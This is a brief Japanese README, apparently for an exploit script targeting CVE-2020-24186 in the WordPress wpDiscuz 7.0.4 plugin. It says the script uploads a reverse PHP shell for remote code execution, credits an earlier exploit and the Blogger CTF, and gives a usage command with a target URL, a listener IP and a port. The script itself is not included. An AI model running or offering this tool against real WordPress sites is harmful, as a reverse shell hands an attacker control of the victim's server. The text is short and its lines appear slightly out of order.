
CVE-2020-24186 の WordPress wpDiscuz 7.0.4 向けエクスプロイトで、リモートコード実行のためのリバース PHP シェルをアップロードします。
h3v0x 氏による エクスプロイト に基づいた WpDiscuz 7.0.4 用のエクスプロイト。
脆弱性を悪用し、リバース PHP シェルをアップロードします。着想は Blogger CTF から得ました。
exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost -l '192.168.1.9' -s 9001
使用例:
